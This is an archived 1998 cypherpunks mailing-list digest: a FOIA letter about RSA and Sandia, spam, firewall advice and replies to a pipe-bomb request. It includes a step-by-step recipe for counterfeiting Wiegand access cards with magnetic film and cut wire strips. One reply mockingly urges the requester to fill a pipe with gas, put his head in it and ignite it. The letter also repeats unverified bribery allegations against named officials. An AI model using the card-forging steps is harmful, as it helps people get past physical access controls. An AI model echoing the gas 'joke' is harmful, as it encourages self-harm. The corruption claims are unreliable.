EBARFIELD@DOEAL.GOV

Dear Ms. Barfield:

VP Al Gore is in the crypto business.

  Information SuperSpyWay 
  Al Gore Approved
  Encryption for China
  in Return for
  Campaign Donations
  by Charles R. Smith

Portions of the above document posted on Internet at 
http://www.us.net/softwar/ and  http://www.aci.net/kalliste/ 
states

1.	Gore charged with encryption policy according to PDD-5 and 
        PRD-27 on April 16, 1993. 

2.	Government officials represent themselves on Al Gore's behalf for 
	RSA patent purchase negotiations in Feb. 1994. 
3.	RSA chairman Bidzos meets with Chinese officials at the same 
        time as Ron Brown in Oct. 1995. 

4.	RSA Chairman Bidzos enters into merger negotiations with Security 
	Dynamics, a company backed by Sanford Robertson, in Nov. 1995. 

5.	VP Gore calls Sanford Robertson from the White House for a 
        donation in Nov. 1995. 

6.	Robertson delivers $100,000 donation ($80,000 soft - $20,000 
	directly into the Clinton/Gore campaign) in Jan. 1996. 
7.	RSA signs deal with China in Feb. 1996. The administration 
	previously prosecuted similar deals but this time does nothing. 
8.	Justice Dept. approves RSA merger with Security Dynamics in 
	April 1996 for $280 million dollars, netting Sanford Robertson's 
	company a cool $2 million just to write the deal. 

In 1991 I was in involved with Sandia National Laboratories
Comprehensive Test Ban Treaty seismic data authenticator.

At that time Sandia director Tommy A Sellers had assumed 
responsibility for directorship from Robert Clem.

Sandia supervisor Tom Wright replaced my supervisor, John Holovka, 
who was the supervisor for the CTBT seismic data authenticator.

Wright brought in Ph.D. Steven Goldsmith to supervise me.

Sellars, Wright, and Goldsmith were new to crypto-type projects.

Much of this is documented at http://www.jya.com/whp021598.htm.

This is evidenced by Sellar's attached SEP 24 1991 memorandum,
which Goldsmith help author, addressed to Dr James J Hearn at 
the National Security Agency.

The SEP 24 memorandum contained a number of technical errors.

I corrected these errors in my attached December 20, 1991 memorandum.

Department of Energy and it predecessors have a well-documented
history of not requiring technical expertise for pursuit of interests.

Stewart Udall, The Myths of August, writes,

    Any cover-up must be implemented and enforced by designated
  agents, and one man emerged in 1953 as the quarterback of the 
  AEC's damage-control effort.  His name was Gordon Dunning.
  Although the personnel charts of the 1950s list him as a low-level 
  "rad-safe" official in the Division of Biology and Medicine,           
  documents demonstrate that he was clothed with authority to    
  manage and suppress information about the radiation released
  by the testing of nuclear weapons. ...

About the time Sellers and Sandia Ombudsman gave me a directed
transfer to break electronic locks for the FBI/ERF [engineering
research facility], Goldsmith and Wright, certainly with the approval
of Sellers, placed a contract with RSA Inc [http://www.rsa.com/], 
I was told.

Ms Barfield, we think the American public needs to know more about
RSA's work with Sandia National Laboratories.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

  1 ALL purchase requisitions, including any attached statement of
    work, issued by Sandia National Laboratories, Los Alamos     
    National Laboratories, or DOE/ALOO between January 1, 1991
    and February 17, 1998 to RSA Inc.

  2  Copies of all invoices from RSA Inc received by Sandia National   
     Laboratories, Los Alamos National Laboratories, or DOE/ALOO 
     between January 1, 1991  and February 17, 1998

If there are any fees for searching for, or copying, the records 
I have requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees 
when the release of the information is considered as "primarily 
benefiting the public."  I believe that this requests fits that 
category and I therefore ask that you waive any fees.

Your office agreed to waive fees before.  This request is surely 
of "public interest."

December 13, 1994 DOE/AL FOIA officer Gwen Schreiner waived fees
for the reason,

        "We have considered your request and have determined that
        release of the requested records is in the public interest,
        that disclosure of this information is likely to contribute
        significantly to public understanding of the operations or
        activities of the government, that you or the organization
        you represent have little or no commercial interest in the
        material contained in the records, that you or the
        organization you represent have the qualifications and
        ability to use and disseminate the information, and that the
        records are not currently in the public domain.  A waiver of
        fees is therefore granted."

This waiver of fees was, undoubtedly, issued as a result of former
Energy Secretary Hazel O'Leary's Openness initiative.

Heart of America paid my way to hear Secretary O'Leary's celebrated
whistleblower speech.

If all or any part of this request is denied, please cite the 
specific exemption(s) which you think justifies your refusal to 
release the information and inform me of your agency's 
administrative appeal procedures available to me under the law.

I would appreciate your handling this request as quickly as 
possible, and I look forward to hearing from you within 20 
working days, as the law stipulates.

Sincerely,                         
                                   


William Payne
13015 Calle de Sandias
Albuquerque, NM 87111


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HOPPYF1215@aol.com
Date: Wed, 19 Aug 1998 16:29:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pipe
Message-ID: <6a2afa8b.35db5fac@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Send me info on how to make a pipe bomb. HoppyF1315




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 19 Aug 1998 18:28:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
Message-ID: <199808200129.DAA07301@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Aug 1998 HOPPYF1215@aol.com wrote:

> 
> Send me info on how to make a pipe bomb. HoppyF1315
> 
> 

Go blow yourself (up) and stay away from those of us who actually have a
clue.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 19 Aug 1998 18:50:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199808200151.DAA11283@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Aug 1998, [iso-8859-1] Jrgen Spangen wrote:

> 
> 
> school suckes
> 
> 

And you blow. It equalizes the pressure.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 19 Aug 1998 19:19:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: email travel information
Message-ID: <199808200220.EAA16473@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 18 Aug 1998 Ltisue@aol.com wrote:

> 
> I am interested in travel between Knoxville, Tennessee  and Des Moines, Iowa.
> I would also be interested in Nashville, Tennessee and Des Moines, Iowa or
> Atlanta and Des Moines, Iowa.  Please notify me of specials in these markets.
> 
> Thanks,
> Linda Tisue
> 
> ltisue@aol.com
> 
> 

I find that having a friend tie you to the train tracks immediately before
a train comes works well for travelling long distances. You might not wind
up where you wanted, but instead may wind up in Spammer Hell, but one has
to start somewhere.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 20 Aug 1998 22:53:11 -0700 (PDT)
To: HOPPYF1215@aol.com>
Subject: RE: Pipe
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8378@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> HOPPYF1215@aol.com[SMTP:HOPPYF1215@aol.com]   aoled:
> 
> Send me info on how to make a pipe bomb. HoppyF1315

Drop it off a cliff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 20 Aug 1998 22:54:49 -0700 (PDT)
To: "Brown, R Ken" <bbt@mudspring.uplb.edu.ph>
Subject: RE: your mail
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8379@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Bernardo B. Terrado[SMTP:bbt@mudspring.uplb.edu.ph]
> 
> About the firewall configuration thing, is it our system or 
> others system  (I mean other servers)?
> And another thing, are you in favor of what I just did, 
> I meqan sending my Information.(commnets)

I assume a firewall is meant to keep your network safe from
damage, whether  accidental or caused by hackers. crackers,
criminals, spies or well-meaning friends and relations 
testing your security.

One of the really really basic rules about security is that
your operational arrangements should be  kept secret.
(NB that is *not* the same as saying that crypto algorithms 
should be secret or that security software source code should
be secret, although NSA & GCHQ will say that it is...)

If there are people who like to hack NT web servers
for fun or profit (I couldn't possibly comment) 
then posting details of your setup on an NT 
admin mailing list is an open invitation. 
The silliest thing to do is to say what fix level your OS 
is at, and that you haven't installed the hotfixes
because that saves potential hackers a lot of time.

Imagine you were worried about being burgled when you 
went on holiday (vacation in the USA :-)   You might ask
online if anyone recommended particular locks or
other security measures. But to say what locks you already
had on what doors might be dodgy. To say that you had a 
particular lock but you had lost the key and therefore 
never used it would be crazy. And to  say what days you were 
going to be away would be asking for it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 20 Aug 1998 22:53:10 -0700 (PDT)
To: Tim Griffiths <bbt@mudspring.uplb.edu.ph>
Subject: RE: your mail
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F837A@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> Bernardo B. Terrado[SMTP:bbt@mudspring.uplb.edu.ph]
> 
> It's funny, some of the mails sent by some mailers are being
> referred by some as a troll. WHY?

It is a variant  spelling of the word "trawl"  - a large 
fishing net dragged behind a ship ("trawler") to catch
lots of fish (and prawns and shrimps and  dolphins and 
seals and turtles and penguins...)

So it is a message sent out in the hope of catching lots of 
replies, maybe to get email addresses for a mailing list
or just for the fun of starting a flame war. 

For example, if I posted my real opinion of the  US 
conservative attitude to guns, abortion,  race, socialism
or the Bell Curve here, I would be trawling.  Sorry, trolling.
Not to mention breaking my  employers rules about 
using email for flames or political comment.

So I won't.  From this id at any rate :-)

The word is used in other contexts - for example 
in the British Civil Service an internal  job ad circulated to 
many offices is called a "trawl".

Ken 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 19 Aug 1998 20:50:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
Message-ID: <199808200350.FAA03953@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Aug 1998 HOPPYF1215@aol.com wrote:

> 
> Send me info on how to make a pipe bomb. HoppyF1315
> 
> 

Well, first you get a big, long pipe. You cut a hole in the top to let
some oxygen in. Attach one end to the natural gas line, and stick your
head in the other end. Turn on the gas. Wait about a minute, then drop a
match into the hole at the top and congratulations, for you've reached a
different and greater incarnation. 

Remember: Inhaling natural gas won't normally kill you, and it needs
oxygen to burn. So you have to blow it up. Instant pipe bomb.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 20 Aug 1998 23:26:16 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Distraught chef cleaves own willy/Artist builds tapestry from 40,000 bras http://stuffed.net/98/8/20/
Message-ID: <19980820071000.28280.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/20/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 19 Aug 1998 18:23:39 -0700 (PDT)
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: RE: your mail
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8372@MSX11002>
Message-ID: <Pine.GSO.3.96.980820092509.25330C-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


About the firewall configuration thing, is it our system or others system 
(I mean other servers)?

And another thing, are you in favor of what I just did, I meqan sending my
Information.(commnets)
:)
===============================================================================

On Wed, 19 Aug 1998, Brown, R Ken wrote:

> But even Cluelesser is the guy who just asked for help with a firewall
> configuration on the NT system admin list and gave a 5 screensfull
> description of how they have set up their firewall and servers, 
> what proxies they have, what they block and allow through... 
> down to and including saying that they *haven't* installed the 
> MS recommended hotfixes for NT security.
> 
> Of course, it could always be bait.
> 
> As, I suppose, could the Italian Bank post, although
> if I was dragnetting for stupid hackers I'd have hoped
> I'd be able to come up with something more plausible.
> 
> 
> Ken Brown
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 19 Aug 1998 18:30:54 -0700 (PDT)
To: Tim Griffiths <griffith@wis.weizmann.ac.il>
Subject: Re: your mail
In-Reply-To: <35DA7BCC.DABD01B8@wis.weizmann.ac.il>
Message-ID: <Pine.GSO.3.96.980820093201.25330E-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


It's funny, some of the mails sent by some mailers are being referred by
some as a troll. WHY?


BTW, could it happen that a mail bomb (I do not know the exact term) exist
in our system without us knowing it? How could it be removed? Coz it
appeared that some mailers are accused of sending spam mails when in truth
they didn't. (I think my sys adms are not fixing it).

===============================================================================
It's funny, I have always been a good 
	listener who understood and cared
		someones secrets, but to my dismay 
			I have never been understood.


metaphone@altavista.net

On Wed, 19 Aug 1998, Tim Griffiths wrote:

> Jim Burnes wrote:
> 
> > I usually ignore these type of messages, but this one gets my vote
> > for the most clueless post of all time. ;-)
> 
> and then Bernardo replied to John Perry's troll, err, offer of help...
> 
> >>Sure thing! Just send us your full name, address (mailing and physical),
> >>and phone number. I'm sure you will get plenty of help.
> 
> >Here is my address  
> >26 H Kamagong St., Commonwealth, Quezon City, Philippines,1121
> 
> I reckon that one gets my vote...:)
> 
> Tim G
> 
> --
> Tim Griffiths                   griffith@wis.weizmann.ac.il
> Center for Submicron Research   http://tim01.ex.ac.uk
> Weizmann Institute of Science   (972)-8-934-2736
> Rehovot 76100 Israel
> PGP Public key available - finger tim@tim01.ex.ac.uk
> 
> The real value lies not in what I say or do,
> but in your reaction to it.  -DF
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 19 Aug 1998 18:49:13 -0700 (PDT)
To: Tim May <tcmay@got.net>
Subject: Re: Pipe
In-Reply-To: <v0313030eb2011ea437f4@[209.66.100.148]>
Message-ID: <Pine.GSO.3.96.980820095157.27157A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


Now, now....
Isn't that charity?!

This is really a 1<@@\^/|_ mailing list!!!!



===============================================================================
On Wed, 19 Aug 1998, Tim May wrote:

> At 4:28 PM -0700 8/19/98, HOPPYF1215@aol.com wrote:
> >Send me info on how to make a pipe bomb. HoppyF1315
> 
> 
> Hoppyhead,
> 
> You'll have to wait until we supply the other AOLholes with the information
> they demanded on thrash music, hacking banks info, LSD manufacturing, and
> get rich quick schemes.
> 
> We're struggling under the workload of millions of new AOL, PacBell,
> Earthlink, Prodigy, and other newbies who have just discovered the Net.
> 
> 
> --Tim May
> 
> 
> 
> "The tree of liberty must be watered periodically with the blood of
> tyrants...."
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist              | black markets, collapse of governments.
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <joswald@rpkusa.com>
Date: Thu, 20 Aug 1998 23:18:44 -0700 (PDT)
To: E-mailingList@rpkusa.com
Subject: ANNOUNCEMENT: RPK ENCRYPTONITE SOFTWARE TOOLKIT NOW AVAILABLE IN ACTIVEX
Message-ID: <199808201809.LAA23498@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------------------

FOR IMMEDIATE RELEASE

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security, Inc.
408-439-5570 x277							212-488-9891
paulam@nadelphelan.com						lynoswald@rpkusa.com
								www.rpkusa.com

RPK ENCRYPTONITE(tm) SOFTWARE TOOLKIT NOW AVAILABLE IN ACTIVEX

The RPK Encryptonite Toolkit Allows Developers to Easily Add Strong Security to Internet, Software, Hardware and Communications Applications

SAN FRANCISCO, CA.  August 20, 1998 - RPK Security, Inc., announced today the release of the ActiveX version of its RPK Encryptonite Software Toolkit version 3.0 for Visual Basic, Visual C++, Borland's C++ Builder, Microsoft's Internet Explorer, Delphi and other ActiveX container applications or development tools.  Also available in C++ implementations and a Delphi VCL component, the RPK Toolkit provides integrators, developers and engineers with everything they need to quickly and easily incorporate fast public key encryption and strong security into their applications without extensive knowledge of cryptography.  RPK Security is a technology leader in strong and fast public key encryption for software, hardware and Internet applications. With development and distribution facilities outside of the U.S., RPK Security is able to provide its customers with a worldwide strong security solution that is available globally unlike competing products that are restricted by U.S. export!
 regulations.
	The RPK Toolkit, a software implementation of the RPK Encryptonite Engine, allows developers to build custom applications with embedded strong encryption for information sensitive applications and industries such as the Internet, communications, legal, health care and financial services.
	The RPK Toolkit is easy to use and manage, making it an attractive and readily accessible solution for developers of new applications. The RPK Toolkit includes sample applications, complete source code and comprehensive documentation. The core technology of the RPK Toolkit leverages the same mathematics behind Diffie-Hellman Key Exchange, a widely used algorithm for creating secure network-based communications systems, and is highly respected by security experts. 
	The RPK Encryptonite Engine is unique in that it combines all the benefits of other public key systems (authentication, digital signatures and digital certificates) with the speed of a secret key system into one algorithm. With the superior performance offered by RPK's Encryptonite Engine, applications requiring streaming data, sound, video or large numbers of transactions, such as credit card payments, receive instantaneous responses and secure communication links.

Features of RPK Encryptonite Software Toolkit 3.0:
Eighty different levels of encryption security 
Global availability with strong encryption
Faster encryption and decryption of data files and streams 
Based on proven mathematics of Diffie-Hellman Key Exchange algorithm
Easy to use object-oriented design
Extremely well suited to embedded applications
Less expensive to implement than competing products

Pricing and Availability:
	The RPK Encryptonite Software Toolkit is now available for licensing worldwide. Pricing starts at $695 per developer (development only). Deployment license fees are based upon custom configurations. For sales information, contact Kevin Shannon, vice president, sales at (610) 399-7999, or via e-mail at sales@rpkusa.com

The RPK Encryptonite Software Toolkit includes: Windows ActiveX,  highly portable, cross-platform, C++ class libraries with full source code for use with Win 95, 98, NT and Linux, and a VCL component for Borland's Delphi 3.0/2.0 running under Microsoft Windows 95 and NT.  It was compiled and tested with Microsoft's Visual C++, Borland C++ Builder, gnu/g++ and Borland Delphi 2.0/3.0.  C source library, Solaris and HP/UX ports, and Java implementations will be available by August 31, 1998.

ABOUT RPK SECURITY
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a strong and uniquely fast public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  RPK solutions are ideal for electronic communications, financial transactions, Internet banking, smart cards, streaming audio-video, telecommunications and more. Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand, Switzerland and the U.K, with worldwide sales and marketing operations in San Francisco, CA.  Visit RPK's website at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 20 Aug 1998 23:26:03 -0700 (PDT)
To: softwar@softwar.net
Subject: crypto-related sinkings of u-boats
Message-ID: <35DC6E89.1A45@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 8/20/98 12:22 PM

Gudmundur Helgason http://uboat.net/
Olduslod 41
IS-220 Hafnarfjordur
Iceland 

How many u-boat sinkings can be DIRECTLY related to a ciphered messages
decoded by the Allies?

My impression is that the crypto-stuff was mostly self-inflating PR done
for business reasons by the 'intelligence' agencies.  

Hedgehogs, hf/df, sonar, radar, and visual sightings played the major
role, was my impression.

However, it looks like some REAL DAMAGE was done using crypto.

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm 

ABQ Journal u 8/16/98  A16 reports

  Iraq Welcomes First Iran Pilgrims Since War

  Families Heading to Muslim Shrines

  By Mariam Sami
  The Associated Press

     AL-MUNTHERIYA, Iraq -  Iranian pilgrims carrying red plastic roses
   entered Iraq on Saturday, the first such border crossing since the
two states
   declared war on each other 18 years ago. ...

    Mehrangiz Terhani, a 55-year-old house-wife who lost a son and a
  brother during the war,  was weeping so hard she had trouble speaking.

    "We have to forget the past," she said.  "I am happy and honored to
  go to a place that I've been waiting to visit for a long time."

I am not reading e-mail.

Best
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://jya.com/f86/whpf86.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 19 Aug 1998 19:48:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
In-Reply-To: <6a2afa8b.35db5fac@aol.com>
Message-ID: <3.0.5.32.19980820124731.008c8d10@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 07:28 PM 8/19/98 EDT, HOPPYF1215@aol.com wrote:
>Send me info on how to make a pipe bomb. HoppyF1315
>
>


Grow Up.

	"Nothing is impossible for the man who doesn't have to do it 
	himself." 
						--Weiler's Law




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 19 Aug 1998 19:50:16 -0700 (PDT)
To: Tim May <cypherpunks@toad.com
Subject: Re: Pipe
In-Reply-To: <6a2afa8b.35db5fac@aol.com>
Message-ID: <3.0.5.32.19980820125027.00822cf0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 8/19/98 -0700, Tim May wrote:
>At 4:28 PM -0700 8/19/98, HOPPYF1215@aol.com wrote:
>>Send me info on how to make a pipe bomb. HoppyF1315
>
>
>Hoppyhead,
>
>You'll have to wait until we supply the other AOLholes with the information
>they demanded on thrash music, hacking banks info, LSD manufacturing, and
>get rich quick schemes.
>
>We're struggling under the workload of millions of new AOL, PacBell,
>Earthlink, Prodigy, and other newbies who have just discovered the Net.
>
>--Tim May
>

Don't forget all the requests for band stickers,,,,

Reeza1
	"Nothing is impossible for the man who doesn't have to do it 
	himself." 
						--Weiler's Law




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 20 Aug 1998 22:51:41 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 20, 1998
Message-ID: <199808201808.NAA04790@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/      for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00006.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00006.bin"
Content-Description: "_CTIA_Daily_News_19980820.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
